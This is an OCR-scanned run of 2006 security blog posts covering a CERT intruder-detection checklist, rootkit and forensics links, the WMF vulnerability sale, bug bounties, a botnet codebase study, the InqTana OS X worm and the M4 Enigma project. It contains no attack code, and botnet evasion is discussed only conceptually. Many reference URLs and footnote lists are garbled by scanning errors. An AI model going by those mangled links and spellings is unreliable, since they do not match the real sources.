[36]security, [37]information security, [38]SiteAdvisor, [39]web crawler, [40]search engine, 
[41]cyberterrorism 
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38, http: //technorati.con/tag/Sitekdvison 
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34. http://www. bcpl.net/~rfrankli/hatedir. pdf 


2.2.12 Detecting intruders and where to look for (2006-02-15 08:48) 


[1]CERT, just released their "[2]Windows Intruder Detection Checklist" from the article : 


"This 

document outlines suggested steps for determining whether your Windows 
system has been compromised. System administrators can use this 
information to look for several types of break-ins. We also encourage 

you to review all sections of this document and modify your systems to 
address potential weaknesses." 
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| find it a well summarized checklist, perhaps the first thing that | looked up when going 
through it was the [3]rootkits section 

given the topic. It does provide links to free tools, but | feel they 

could have extended to topic a little bit. Overall, consider going 

through it. Another checklist | recently came across is the "[4]11 things to do after a hack" 
and another quick summary on "[5]10 threats you probably didn’t make plans for". 


[6]Rootkits 

are gaining popularity, and with a reason - it takes more efforts to 

infect new victims instead of keeping the current ones, at least from 

the way | see it. In one of my previous post "[7]Personal Data Security Breaches - 2000/2005" 
| mentioned about a rootkit placed on a server at the [8]University of Connecticut 

on October 26, 2003, but wasn’t detected until July 20, 2005, enough 

for auditing, detecting attackers and forensics? Well, not exactly, 

still something else worth mentioning is the interaction between 

auditing, rootkits and forensics. There’s also been another reported 

event of using [9]rootkit technologies for DRM(Digital Right Management) purposes, not on 
[10]CDs, 

but DVDs this time, so it’s not enough that malware authors are 

utilizing the rootkit concept, but flawed approaches from companies 

where we purchase our CDs and DVDs from, are resulting in more threats 

to deal with! 


Check CERT’s "[11]Windows Intruder Detection Checklist" and if interested, also go though 
the following resources on rootkits and digital forensics : 


[12]Windows rootkits of 2005, part one 

[13]Windows rootkits of 2005, part two 

[14]Windows rootkits of 2005, part three 

[15]Malware Profiling and Rootkit Detection on Windows 

[16]Timing Rootkits 

[17]Shadow Walker - Raising The Bar For Windows Rootkit Detection - [18]slides 
[19]When Malware Meets Rootkits 

[20]Leave no trace - book excerpt 


[21]Database Rootkits 
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[22]Rootkits and how to combat them 

[23]Rootkits Analysis and Detection 

[24]Concepts for the Stealth Windows Rootkit 

[25]Avoiding Windows Rootkit Detection 

[26]Checking Microsoft Windows Systems for Signs of Compromise 


[27]Implementing and Detecting Implementing and Detecting an ACPI BIOS Rootkit 


[28]Host-based Intrusion Detection Systems 

[29]Forensics Tools and Processes for Windows XP Clients 

[30]F.1.R.E - Forensic and Incident Response Environment Bootable CD 
[31]Forensic Acquisition Utilities 

[32]FCCU GNU/Linux Forensic Bootable CD 10.0 

[33]iPod Forensics :) 

[34]Forensics of a Windows system 

[35]First Responders Guide to Computer Forensics 


[36]Computer Forensics for Lawyers 


Technorati tags: 


[37]security, [38]information security, [39]forensics, [40]rootkit, [41]security breach, [42]CERT 
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2.2.13 A timeframe on the purchased/sold WMF vulnerability (2006-02-15 19:03) 


The [L]WMF vulnerability and how it got purchased/sold for $4000 was a major event during 
January, at least for me as for quite some time the industry was in the twilight zone by not 
going through a recently released report. But does this fact matters next to figuring out how 
to safeguard the security of your network/PC given the time it took the vendor to first, realize 
that it’s real, than to actually patch it? Something else that made me an impression is that 
compared to the media articles and my post, was | the only one interested in who bought, 
instead of who sold it? 
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So here’s a short timeframe on how it made it to to the mainstream media : 


January 27 - Kaspersky are the first to mention the "purchase" in their [2]research 


January 30 I've started [3]blowing the whistle and [4]friends picked it up (even the guy that 
got so upset about it!) 


January 31 Meanwhile, someone eventually [5]breached AMD’s forums and started infecting 
its visitors! 


February 2 [6]Microsoft Switzerland’s Security blog featured it 


February 2 [7]LinuxSecurity.com republished it 


February 2 [8]DSLReports.com picked it up 


February 2 Appeared at [9]Slashdot 


February 3 [10]OSIS.gov(an unclassified network serving the intelligence community with 


[11Jopen source intelligence) picked it up :) 
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What’s the conclusion? Take your time and read the reports thoroughly, cheer Kaspersky’s 
team for their research? For sure, but keep an eye on the [12]Blogosphere as well! 


Technorati tags : 


[13]security, [14]information security, [15]wmf vulnerability, [16]vulnerabilities, [17]Kasper- 
sky 
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6. http: / /ologs.technet.com/as_schveiz_ security blog/archive/2006/02/02/ 418618 aspa 
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8. http: //www.dslreports . com/forum/remark, 15384516 
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://ddanchev .blogsp bility-purchased-for.htm 
://www.sahw.com/wp -las-vulnera 


. http://it.slashdot.org/article.pl?sid=06/02/02/215210&from=rss 
10, http: //vev.tas.org/irp/progran/disseninate/osis.nt 


http://www.fas.org/irp/program/disseminate/osis. ht 
http: //en.wikipedia. org/wiki/OSIN 


2.2.14 The end of passwords - for sure, but when? (2006-02-16 19:15) 


My first blog post "[1]How to create better passwords - why bother?!" back in December, 
2005, tried to briefly summarize my thoughts and comments I’ve been making on the most 
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commonly accepted way of identifying yourself - passwords. 


[2]Bill Gates did a commentary on the issue, note where, at the [3]RSA Conference, perhaps 
the company that’s most actively building awareness on the potential/need for two-factor 
authentication, or anything else but using static passwords for various access control purposes. 
Moreover, it was again Bill Gates who wanted to integrate the [4]Belgian elD card with MSN 
Messenger ([5]Anonymity or Privacy on the Internet?) Microsoft are always reinventing the 
wheel, be it with [6Jantivirus, or their [7]Passport service, and while they have the financial 
obligations to any of their stakeholders, | feel it’s a wrong approach on the majority of 
occasions. 


What | wonder is, are they forgetting the fact that over 95 % of the PCs out there, run 
Microsoft Windows, and not Vista, and how many would continue to do so polluting the 
Internet at the bottom line. My point is that MS’s constant rush towards "[8]the next big thing" 
doesn’t actually provides them with the resources to tackle some of the current problems, at 
least in a timely manner. What do you think? What could Microsoft do to actually influence 
the acceptance of [9]two-factor authentication, and moreover, [10]how feasible is [11]the 
concept at the bottom line? 


Technorati tags : 
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2.2.15 How to win 10,000 bucks until the end of March? (2006-02-17 13:45) 


[1]l feel that, in response to the recent event of how the [2]WMF vulnerability got pur- 
chased/sold for $4000 (an [3]interesting timeframe as well), [4]iDefense are actively working 
on strengthening their market positioning - that is the maintain their pioneering position as a 
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perhaps the first company to start paying vulnerability researchers for their discoveries. 


The company recently [5]loffered $10,000 for the submission or a vulnerability that gets 
categorized as critical in any of Microsoft’s Security Bulletins. In the long-term, would vulnera- 
bility researchers be able to handle the pressure put on them through such financial incentives, 
and keep their clear vision instead of sell their souls/skills? What if someone naturally offers 
more, would money be the incentive that can truly close the deal, and is it just me realizing 
how bad is it to commercialize the not so mature vuln research market, namely how this would 
leak all of its current weaknesses? 


Consider going through some of my previous thoughts on the [6]emerging market for 
software/Oday vulnerabilities as well and stay tuned for another recent discovery a dude 
tipped me on, thanks as a matter of fact! 


Technorati tags: 


[7]lidefense, [8]vulnerabilities 
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. http: //technorati.com/tag/vulnerabilities 


2.2.16 Smoking emails (2006-02-17 23:41) 


[1] 
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| just came across this, "[2]Morgan Stanley offers $15M fine for e-mail violations" - from the 
article : 


"US investment bank Morgan Stanley will offer a settlement to the Securities and Ex- 
change Commission (SEC), agreeing in principle to pay a $15 million fine for failing to preserve 
e-mail messages. The e-mail messages could have provided useful evidence in several cases 
brought against the company. In one case, resulting in a $1.58 billion judgement against the 
bank, a judge turned the burden of proof on Morgan Stanley after learning they had deleted 
e-mails related to the case. However, Morgan Stanley has not yet presented the offer to the 
SEC nor is there a guarantee the SEC will accept. The investment bank says it is fixing the 
problems that led to the erasure and is pleading for leniency." 
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He, He, He! 


You see, the email archiving market is about to top $310M for 2005 according to the 
IDC, still one of the world’s most powerful investment banks cannot seem to be able to comply 
with the requirements. 


Lack of financial power - nope, lack of incentives - yep! The case reminds me of KPMG’s 
tax shelters, [3]McAfee’s fine for accounting scam between 1998-2000, and the "[4]Smoking 
Emails" Admissible In $1 Billion Enron-Related Chase Case". 


Quit smoking emails, and take advantage of [5]MailArchiva - Open Source Email Archiv- 
ing and Compliance. 
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Techorati tags : 
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2.2.17 DVD of the weekend - The Lone Gunmen (2006-02-17 23:47) 


[1] 


The [2]Lone Gunmen on two double-sided discs, pure classic! In one of my chats with Roman 
Polesek, from [3]Hakin9, he was wise enough to state the you cannot be a prophet in your 
own industry, simple, but powerful statement you should take into consideration. 


Initiatives such as The Lone Gunmen, the [4]xX-files, and [5]The Outer Limits have al- 
ready proven useful, given someone listens! [6]For instance : 


"In a foreshadowing of the September 11, 2001 attacks, subsequent conspiracy theories, 
and the 2003 invasion of Iraq, the plot of the March 4, 2001 pilot episode of the series depicts 
a secret U.S. government agency plotting to crash a Boeing 727 into the World Trade Center 
via remote control for the purpose of increasing the military defence budget and blaming the 
attack on foreign "tin-pot dictators" who are "begging to be smart-bombed." This episode 
aired in Australia less than two weeks before the 9/11 attacks, on August 30." 
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Conspiracy theorists do have a lot to say, so don’t ignore them, find the balance, and 
enjoy the series :) 


You can also browse through some transcripts as well. 


Technorati tags : 


[7]conspiracy 


1, fittps://photost. blogger con/blogger/1988/1779/200/gunnen.0.jpd 
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2.2.18 Chinese Internet Censorship efforts and the outbreak (2006-02-24 13:14) 


In some of my [1]January’s Security Streams, | did some extensive blogging expressing my 
point of view on the current [2]Internet censorship activities, and tried to emphasize on the 
country whose Internet population is about to outpace the U.S one - China. In my posts 
"[3]China - the biggest black spot on the Internet’s map", "[4]2006 = 1984?", "[5]Twisted 
Reality", you can quickly update yourself on some of the recent developments related to the 
topic, but what has changed ever since? 


Government bodies such as the DoJ seem to favour the amount of data the most popu- 
lar and [6Jadvanced search engine Google holds and [7]tried to obtain information for the 
purpose of "social responsibility". What’s more to consider are some of the [8]weak statements 
made, namely : 
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"House Government Reform Committee Chairman Tom Davis (R-VA) has criticized Google for 
refusing to hand search records over to the US Justice Department while cooperating with 
China in censoring certain topics. Justice sought the records to bolster its case against a 
challenge to online anti-pornography laws, but Google refuses to submit the records on privacy 
grounds. Davis does not expect a standoff between Google and the government, but hopes an 
agreement can be reached, allowing Google to supply the records without frightening users 
that their searches may be examined." 


and in case you're interested, some of my [9]comments, : 


"Is it just me or that must be sort of a black humour political blackmail given the situation?! 
First, and most of all, the idea of using search engines to bolster the online anti-pornography 
laws created enough debate for years of commentaries and news stories, and was wrong 
from the very beginning. Even if Google provide the data requested it doesn’t necessarily 
solve the problem, so instead of blowing the whistle without any point, sample the top 100 
portals and see how they enforce these policies, if they do. As far as China is concerned, or 
actually used as a point of discussion, remember the different between modern communism, 
and democracy as a concept, the first is an excuse for the second, still, | feel it’s one thing to 
censor, another to report actual activity to law enforcement. | feel alternative methods should 
be used, and porn “to go” is a more realistic threat to minors than the Net is to a certain 
extend, yet the Net remains the king of content as always." 


Google indeed issued a [10]statement, sort of excusing the censorship under the statement 
of "the time has come to open ourselves to the Chinese market", and while their intentions 
make business sense, [11]the [12]outbreak [13]had [14]very positive consequences from my 
point of view - build more awareness and have the world’s eyes on the Chinese enforcement 
of censorship practices, but is it just China to blame given "Western" countries do censor as 
well, or is it China’s huge ambitions of maintaining a modern communism in the 21st century 
that seem to be the root of the problem? 
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[15] 


In an article "[16]A day in the life of a Chinese Internet Police Officer" | read some time 
ago, you can clearly see the motivation, but also come across the facts themselves : you 
cannot easily censor such a huge Internet population, instead, guidance instead of blocking, 
and self-regulation(that is limiting yourself with fear of prosecution) seem to be the current 
practice, besides [17]jailing journalists! And while sometimes, you really need to come up 
with a [18]creative topic worth writing about, [19]free speech is among the most important 
human rights at the bottom line. 


[20]Chris Smith, Chairman of the House subcommittee that oversees Global Human Rights, 
proposed a discussion draft "[21]The Global Online Freedom Act of 2006" "to promote freedom 
of expression on the internet [and] to protect United States businesses from coercion to 
participate in repression by authoritarian foreign governments". It is so "Surprising" to find 
out that they are so interested in locating cyber-dissidents : "U.S. search engine providers 
must transparently share with the U.S. Office of Global Internet freedom details of terms or 
parameters submitted by Internet-restricting countries." exactly the same way | mentioned in 
my previous "[22]Anonymity or Privacy on the Internet?" post. 


Meanwhile, the [23]OpenNetlInitiative also [24]released a [25]bulletin analyzing Chinese 
non-commercial website registration regulation, giving even further details on the recent 
"you're being watched" culture that tries to cost-effectively deal with the issue of self- 
regulation : 


"In a report published last year, “[26]Ilnternet Filtering in China: 2004-2005,” ONI shared 
its research findings that China’s filtering regime is the most extensive, technologically 
sophisticated, and broad-reaching Internet filtering system in the world. This new regulation 
does not rely on sophisticated filtering technology, but uses the threat of surveillance and 
legal sanction to pressure bloggers and website owners into self-censorship. While savvy 
website owners might thwart the registration requirement with relative ease, the regulation 
puts the vast majority of Chinese Internet users on notice that their online behaviour is being 
monitored and adds another layer of control to China’s already expansive and successful 
Internet filtering regime." 
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Yet another recent research | came across is a university study that finds out that "[27]60 % 
Oppose Search Engines Storing Search Behaviours", you can also consider the "[28]alterna- 
tives" if you’re interested :) A lots to happen for sure, but it is my opinion that personalized 
search is the worst privacy time bomb a [29]leading search engine should not be responsible 
for, besides open-topic data retention policies and not communicating an event such as the 
Doj’s one, but complying with it right away, bad Yahoo!, bad MSN! 


At the bottom line, Google’s notifications of censored content(as of March, 2005 only, 
[30]excluding the period before!), the general public’s common sense on easily evaluating 
what’s blocked and what isn’t, and the powerful digital rights fighting organizations that 
simultaneously increased their efforts to gain the maximum out of the momentum seemed 
to have done a great job of building awareness on the problem. Still, having to live with 
the booming wanna be "free market" Chinese economy, and the country’s steadily climbing 
position as a major economic partner, economic sanctions, quotas, or real-life scenarios would 
remain science fiction. 


Technorati tags : 
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2.2.19 Master of the Infected Puppets (2006-02-24 14:37) 


[1]In some of my previous posts, "[2]What are botnet herds up to?", "[3]Skype to control 
Botnets", "[4]The War against Botnets and DDoS attacks", and "[5]Recent Malware Develop- 
ments", | was actively providing resources and updating my blog readers (thanks for the tips 
and the info sharing, | mean it!) related to one of the most relevant [6]threats to the Internet 
( more [7]trends and [8]bureaucracy ) - Botnets. 


| recently came across a well researched [9]report giving a very in-depth overview and 
summary of important concepts related to Botnets. Recommended bed time reading, and 
here’s an excerpt : 
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"In this paper we begin the process of codifying the capabilities of malware by dissect- 
ing four widely-used Internet Relay Chat (IRC) botnet codebases. Each codebase is classified 
along seven key dimensions including botnet control mechanisms, host control mechanisms, 
propagation mechanisms, exploits, delivery mechanisms, obfuscation and deception mecha- 
nisms. Our study reveals the complexity of botnet software, and we discusses implications for 
defense strategies based on our analysis" 


Some of the findings that | also came across in my "[10]Malware - future trends" search 
worth mentioning are : 


- "The overall architecture and implementation of botnets is complex, and is evolving to- 
ward the use of common software engineering techniques such as modularity." Namely, no 
one is interested in [11]reinventing the wheel again, and the Simple Botnet/Malware Com- 
munication Protocol I’ve once mentioned (originally came across the concept [12]here) could 
give the malware scene an impressive scale, but could it also put AV vendors and researchers 
in favorauble position where exploiting protocol weaknesses is more beneficial than current 
approaches? 
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- "Shell encoding and packing mechanisms that can enable attacks to circumvent defen- 
sive systems are common. However, Agobot is the only botnet codebase that includes support 
for (limited) polymorphism" 


Smart! Mainly because of the fact that "The malware delivery mechanisms used by botnets 
have implications for network intrusion detection and prevention signatures. In particular, 
NIDS/NIPS benefit from knowledge of commonly used shell codes and ability to perform simple 
decoding. If the separation of exploit and delivery becomes more widely adopted in bot code 
(as we anticipate it will), it suggests that NIDS could benefit greatly by incorporating rules that 
can detect follow-up connection attempts." 


-"All botnets include a variety of sophisticated mechanisms for avoiding detection (e.g., 
by anti-virus software) once installed on a host system." 
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Retention instead of acquisition of new zombies would tend to dominate from my point 
of view. Patching the hosts themselves, [13]hiding presence, dealing with the easy to detect 
idle zombie’s presence, TCP obfuscations, tests for debuggers, are among the current methods 
used. 


[14] 


Botnets will continue to dominate due to their [15]concept and [16]potential for growth, 
and while monitoring and doing active research is still feasible, encrypted communications as 
a logical development should also be researched as a concept, but how many *public* IRC 
servers, if such are used, support SSL encryption? 
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16. http://www.egghelp.org/tcl.ht 


2.2.20 Give it back! (2006-02-24 15:36) 


According to a recent article "[1]Secret program reclassifies documents" : 


"Researcher Matthew Aid has discovered a secret reclassification program that has moved 
thousands of declassified pages out of the National Archives and Records Administration’s 
facility in Maryland. Some groups, such as George Washington University’s Nation Security 
Archive, are fighting to end the program, arguing that the government has no right take 
back information it has published. The reclassification has been ongoing since 1999 as the 
Central Intelligence Agency, the Defense Intelligence Agency, and the Defense and Justice 
departments take back information they say had been inadvertently published. The National 
Security Archive describes some of the documents that have been reclassified as uninteresting 
and mundane." 


And from The National Security Archive : 


"Washington, D.C., February 21, 2006 - The CIA and other federal agencies have secretly 
reclassified over 55,000 pages of records taken from the open shelves at the National Archives 
and Records Administration (NARA), according to [2]a reportpublished today on the World 
Wide Web by the National Security Archive at George Washington University." 


[3] 


[4]OSINT [5]has greatly evolved from President Nixon’s remark in respect to the [6]CIA 
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(2) 


“What use are they? They’ve got over 40,000 people over there reading newspapers.”, 
whereas Secrecy is a major weakness to the national security of a country in a very complex 
way. | feel that sometimes, you need the average citizen’s unbiased opinion on a major issue, 
but | guess I’m not into politics, just figuring out what is going on at the bottom line! 


More on Secrecy, Intelligence, Misc : 


[7]Making Intelligence Accountable 

[8]Why Spy? The Uses and Misuses of Intelligence (1996) 

[9]Intelligence Analysis for Internet Security : Ideas, Barriers and Possibilities 
[10]U.S. Electronic Espionage : A Memoir 

[11]Terrorism prevention in Russia : one year after Beslan 

[12]Crypto Law Survey 

[13]Cryptome 

[14]Project on Government Secrecy 


[15]Shhh!!: Keeping Current on Government Secrecy 


Technorati tags : 


[16]Secrecy, [17]lIntelligence 


tpi //nwy, few. con/article02379-00-21-06-WebERSS=yed 
| http://www. gi. edu/~nsar chi /MSAEBE/MSAEBBI79/#report| 
| fttp://avy.prvatch,ong/inages/ wud. gif 

| heep://en. wikipedia. org/viki/OSINT 


ttp://www.cia.gov/csi/studies/Vol49no02/reexamining the_distinction_3.ht 


. hbttp://www.dcaf.ch/handbook_intelligence/_publications.cfm 
. http: //www.cato.org/pubs/pas/pa-265. html 
. http://www.cert .org/archive/html/spie.htm 
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2.2.21 One bite only, at least so far! (2006-02-24 16:21) 


[1]Apple’s OS X has always been positioned as a juicy target even though it’s market share is 
almost non-existent compared to Microsoft’s domination. And while converting iPod customers 
into MAC users hasn’t shown any progress so far and | doubt it would, malware authors are as 
always actively experimenting or diversifying the threatscape. One question remains unclear, 
why would someone want to own a MAC, compared to owning hundreds of thousands of 
Windows PCs out there? To me, it’s not about achieving the scale necessary for a [2]Botnet, 
rather, experiment, show that it’s possible through POC releases, or basically start attacking 
the living in a safe heaven until for now, MAC users. 


Recently, an [3]OS X trojan appeared, [4]second (nice attitude from Apple on embracing 
the inevitable!), [5Jone [6]followed, and besides "worming" a vulnerability and experimenting 
with propagation methods, | don’t really think it’s the big trend everyone is waiting for, a 
standard POC(Cabir), whose core function would empower a generation of variants for years 
to come. 


| just came across this from Trifinite’s blog : 


"[7]Trifinite.grouomember [8]Kevinhas published a [9]paperdetailing the techniques he 
used in the development of the InqTana Bluetooth worm that targets vulnerable Mac OS X 
systems. There has been significant confusion surrounding this worm, so here are some 
salient points: 
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- The concurrent release of the OS X Leap.A and IngTana.A worms is coincidental 


- There is no conspiracy, AV vendors and Apple were notified about Kevin’s progress in 
developing this worm in advance of making details publicly available 


- Both 10.3 and 10.4 systems are vulnerable until patched with APPLE-SA-2005-05-03 
and APPLE-SA-2005-06-08 


- InqTana prompts before infecting *by design*, Kevin was just trying to be nice, but the 
worm could easily spread silently 


Kevin’s paper is available at [10]http://www.digitalmunition.com/IngTanaThroughTheEyes.txt. 
Comments can be directed to the [11]BlueTraqmailing list. Our sympathies to those orga- 
nizations who were affected by the false-positive signatures published by overzealous AV 
companies." 


It clarifies a lot | think, mostly that, while architecture and OS popularity have a lot to 
do with security and incentives for attacks, "InqTana.A itself has absolutely nothing to do with 
Leap.A. My work was done completely independent of the author of Leap. The day after | sent 
out queries to the AV companies about my code ! was shocked to see another OSX worm had 
already been in the news. While my worm sat in the mail spools of several AV companies they 
were busy writing about the "First Trojan/Worm for OSX"." 
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Leakage of IP, or I’m being a paranoid in here? [12]Wired also has some nice comments. 


Technorati tags : 


[13]Security, [14]Information Security, [15]Apple, [16]Malware, [17]Leap, [18]InqTana, 
[19]Anti Virus 


1. ftp: //photoad. blogger con blogger/1993/1776/1600/apple_virus. jpg 

_hetp://ddanchey.blogepot .con/2006/02/ar~against-botnete-and-ddos-attacks. Hal 
_hatp:/ /auy.securityfocus.con/brief/349 
| bep://www,securitytocua.con/briet 14g 
_ http: //auy.£- secure con/weblog/archives/archive-022006,ntal#00000815 

. http://www. viruslist . com/en/weblog 

| natp://eritinive.ong/trifinive_ group. Hal 


ttp://trifinite.org/trifinite_group_kevin.htm 
. http://www. digitalmunition.com/InqTanaThroughTheEyes. txt 
10 


. http: //www.digitalmunition.com/InqTanaThroughTheEyes. txt 
11. 
12. 

13. 
14 
15. 
16. 
17 
. http://technorati.com/tag/InqTana 
F p://technorati.com/tag/Anti+Virus 


2.2.22 DVD of the Weekend - The Outer Limits - Sex And Science Fiction Collection 
(2006-02-25 20:35) 


"A sextet of sci-fi tales opens with Alyssa Milano as a woman whose "close encounter" leaves 
her with an insatiable lust in "Caught in the Act"; the sole survivor of a nuclear holocaust gets 
some computer-generated companionship in "Bits of Love," with Natasha Henstridge; Sofia 
Shinas is "Valerie 13," a robot whose emotions become all-too-human; a man who’s lived his 
life onboard a mysterious spaceship meets his female counterpart in "The Human Operators," 
with Jack Noseworthy and Polly Shannon; a nerd becomes a ladies man via a high-tech "image 
enhancer" in "Skin Deep," with Antonio Sabato, Jr. and Adam Goldberg; and an alien plant 
becomes a deadly and 


seductive "Flower Child," with Jud Taylor." 
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[1]Get it, [2]find [3]out [4]more, and [5]listen to the wisdom from previous episodes. 


1. http://www. amazon .com/gp/product/B000068V9S/002-5192813-5250468?v=glance&n=130 
2. http://www.theouterlimits.com/index2.htm 
3. http: //www.innermind.com/outerlimits/ 


4. http://en.wikipedia. org/wiki/The_Outer_Limits 


5. http: //www.theouterlimits.com/downloads/index.html?controlvoices 


2.2.23 Get the chance to crack unbroken Nazi Enigma ciphers (2006-02-27 10:49) 


[1]Nice initiative | just came across to. From the "[2]M4 Message Breaking Project" : 


The M4 Project is an effort to break 3 original Enigma messages with the help of dis- 
tributed computing. The signals were intercepted in the North Atlantic in 1942 and are 
believed to be unbroken. Ralph Erskine has presented the intercepts in a [3]letterto the 
journal Cryptologia. The signals were presumably enciphered with the four rotor Enigma M4 - 
hence the name of the project. 


This project has officially started as of January 9th, 2006. You can help out by donating 
idle time of your computer to the project. If you want to participate, please follow the client 
install instructions for your operating system: 

[4]Unix Client Install 

[5]Win98 Client Install 

[6]Win2000 Client Install 


[7]WinXP Home Client Install 


[8]WinXP Pro Client Install 


The first message is already [9]broken as a matter of fact, and looks like that : 
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Ciphertext : 


nczwvusxpnyminhzxmqxsfwxwlkjahshnmcoccakuqpmkcsmhkseinjus 
blkiosxckubhmllxcsjusrrdvkohulxwccbgvliyxeoahxrhkkfvdrewezlx 
obafgyujqukgrtvukameurbveksuhhvoyhabcjwmaklfklmyfvnrizr 
vvrtkofdanjmolbgffleoprgtflvrhowopbekvwmugqfmpwparmftha 


gkxiibg 


Deciphered and in plain text : 


From Looks:Radio signal 1132/19 contents:Forced to submerge during attack, depth charges. 
Last enemy location08:30h, Marqu Aj 9863, 220 degrees, 8 nautical miles, (| am) following(the 
enemy). (Barometer) falls (by) 14 Millibar, NNO 4, visibility 10. 


You no longer need the NSA to assist in here, still they sure have contributed a lot while 
"[10]Eavesdropping on Hell", didn’t they? 


[11]Distributed Computing is a powerful way to solve complex tasks, or at least put the 
PC power of the masses in use. It’s no longer required to hire processing power on demand 
from any of these [12]jewels, but download a client, start participating, or find a way to 
motivate your future participants. In my previous post "[13]The current state of IP spoofing" | 
commented on the ANA Spoofer Project and featured a great deal of other distributed projects. 
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Meanwhile, the [14]StartdustAThome project also started gaining grounds, so is it [15]ETs, 
[16]Space dust, [17]global IP spoofing susceptibility, or [18]unbroken Nazi’s ciphers - you 
have the choice where to participate! 


Technorati tags : 


19]Security, [20]Cryptography, [21]Enigma, [22]Distributed 


. http://photos1. blogger .com/blogger/1933/1779/1600/novaenigmadiagram. gif 
. http: //www.bytereef.org.nyud.net:8080/m4_project .htm 
. http://members.fortunecity.com/jpeschel/erskin.htm 


ttp://www.bytereef .org.nyud.net :8080/howto/m4-project/enigma-client-unix-install.htm 


[ 

1 

2 

3 

4 

Di ://waw.bytereef.org. :8080/howto/m4-project/enigma-client-win98-install.htm 

6 ://www.bytereef. : : :8080/howto/m4-project/enigma-client-win2000-install.htm 

7 ://www.bytereef . ; : :8080/howto/m4-project/enigma-client-winXP-Home-install.htm 
8 ://waw.bytereef. : : :8080/howto/m4-project/enigma-client-winXP-Pro-install .htm 
9 


tp://www.bytereef.org.nyud.net:8080/m4-project-first-break.htm 


10. 

11. http://en.wikipedia.org/wiki/Distributed_computing 

2 

13 


14 


16. http://stardustathome.ssl.berkeley.edu/ 
17. http://spoofer.csail.mit.edu/ 


19. http://technorati.com/tag/Securit 
ttp://technorati.com/tag/Cryptograph 


20 
21 
22 


18. http://www. hut-six.co.uk/ebreaker/index.htm 


ttp://technorati.com/tag/Enigma 
ttp://technorati.com/tag/Distributed 


2.3 March 


2.3.1 DVD of the (past) weekend (2006-03-06 14:12) 
Hi folks, as I’ve been down for a couple of days, I’m actively updating my blog, so watch out 


for some quality posts later on and apologies for the downtime. Thanks for the interest and 
the questions received whatsoever! 
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So, after the "[1]Lone Gunmen", and "[2]The Outer Limits - Sex And Science Fiction Collection" 
it was about time we go beyond cyberspace with the second part of the "[3]Lawnmower man" 
a classic [4]techno thriller, with a lot of VR, Cyberpunks, and futuristic scenarious. 


Favo [5]quote from part one - "/ find a way out, or ! die in this diseased main frame" 
which is also worth watching as a matter of fact. I’m so excited of seeing [6]Ray Kurzweil’s 
views of the future in a DVD box. | am especially interested into [7]Cyberware, and the biolog- 
ical adaptation with technologies. As a matter of fact, there have already been reported cases 
of people with [8]implanted RFID chips, and while they wish they had [9]Johnny Mnemonic’s 
view of the Internet, that must be some kind of a joke. Picture yourself scanned and monitored 
wherever you go while walking around with a false sense of security. RFID is a lot of buzz, | 
feel the potential for information sharing, and resources cutting is outstanding, still, the levels 
of security or lack of understanding on the privacy implications is the biggest downsize so far. 


Would we someday build an [10]AI that would crawl the Universe forever colonizing the 
obeying the morale we learnt "it" to? | find this such a great idea :) 


Some resources on Cyberware and Cyberpunks : 


[11]The Cyberpunk Project 
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[12]Cyberpunk 

[13]"Cyberpunks in Cyberspace" 

[14]Cyberanarchists, Neuromantics and Virtual Morality 
[15]Cyberpunks and their online activities 


[16]Cyberpunk - Ebook 


[17]Cyberware Technology 
[18]Realistic and Affordable Cyberware Opponents for the Information Warfare BattleSpace 


[19]Cyberware Implants 


Technorati tags : 


[20]Lone Gunmen, [21]The Outher Limits, [22]Lawnmower Man, [23]Ray Kurzweil, [24]Cyber- 
ware, [25]Cyberpunk 


. http://ddanchev. blogspot . com/2006/02/dvd- of-weekend-lone- gunmen. htm 


ttp://ddanchev .blogspot.com/2006/02/dvd-of-weekend-outer-limits-sex-and.htm 


. http: //www.amazon.com/gp/product/BOO00AZT7B/103-5082892- 6451063? v=glance&n=130 
. http://en.wikipedia.org/wiki/Techno-thrille 


ttp://www.script-o-rama.com/movie_scripts/1/lawnmower-man-script-transcript-king. htm 


i kain/pu K f 
: .com/h fe 


. http: //www.cybergeography.org/atlas/ johnny. jpg 
10. http://www. imdb. com/title/tt0083658/ 


ttp://medi 
ttp://en.wikipedia.org/wiki/Cyberware 
ttp://seat 


ry 
ray 


ttp://project.cyberpunk.ru/ 


py 
N 


. http://en.wikipedia.org/wiki/Cyberpunk 
. http://www.si.umich.edu/~pne/cyberpunks. htm 
. http://www.dvara.net/HK/THESIS.PD 
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a.kurzweilai.net/ b/RayKurzweilReader . pd 
tletimes.nwsource tm1/localnews/2002835871_chipimplant01.htm 
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19, 
20. 

21. 

22. 

23, 

24, 

25, 


2.3.2 February’s Security Streams (2006-03-06 14:44) 


[1]It’s about time | summarize all my February’s Security Streams, you can of course go 
through my [2]January’s Security Streams as well, in case you’re interested in what was 
inspiring me to blog during January. The truth is - you, the 4,477 unique and 580 unique 
visitors returning during the entire February, and as this blog is melting down due to its 
audience and content, thanks for your time! As a matter of fact, it’s been a while since I’ve 
last participated in students’ thesis, but who knows these days :) 


1. "[3]Suri Pluma - a satellite image processing tool and visualizer", treat tool | recom- 
mended to everyone interested in that type of tools, as a matter of fact, | also got many other 
suggestions for alternatives. More on [4]visualization 


2. "[5]CME - 24 aka Nyxem, and who’s infected?" a small update on the Nyxem threat 
if any during February 


3. "[6]What search engines know, or may find out about us?"" a commentary on a CNET’s Q 
&A with leading search engines on how they deal with subpoenas and user’s privacy, further 
resources and opinions on the topic are provided as well. Anything that can be linked will be 
one way or another. 


4. "[7]The current state of IP spoofing" introducing the ANA Spoofer Project, commen- 
tary on the current state according to their sample, and many other distributed concepts 
again related to security are mentioned 
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5. "[8]Hacktivism tensions" A brief coverage of the mass defacements of Danish sites 
out of the Muhamad’s cartoons distribution over Europe, and of course, over the Net. | also 
mentioned a previous rather more severe case or Nation2Nation cyberwarfare PSYOPS attacks 


6. "[9]Security Awareness Posters" a small list with links to free security awareness posters 
worth using or enjoying their witty messages 


7. "[10]A top level espionage case in Greece" With the great possibility of an insider’s 
job, the eavesdropping of major government officials and citizens was indeed the second case 
that made me an impression, next to the stone transmitter found in a Moscow’s park 


8. "[11]The War against botnets and DDoS attacks" A post covering the introduction of 
McAfee’s bot killing system, The ZombieAlert Service, some comments and lots of external 
resources on fighting and protecting against Botnets and DDoS attacks 


9. "[12]Who needs nuclear weapons anymore?" An in-depth article | wrote while coming 
across a news article on a recent EMP warhead test, with the idea to bring more awareness on 
the potential of EMP weapons, some of the current trends, and the emerging weaponization of 
Space . A[13]reader also mentioned a [14]Mig-25 [15]found on Google Maps 
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10."[16]Recent Malware developments" a post summarizing various events right in the 
middle of February, discussing some of the emerging trends to keey an eye on, a a commen- 
tary on Kaspersky’s summary for 2005, worth checking out as well 


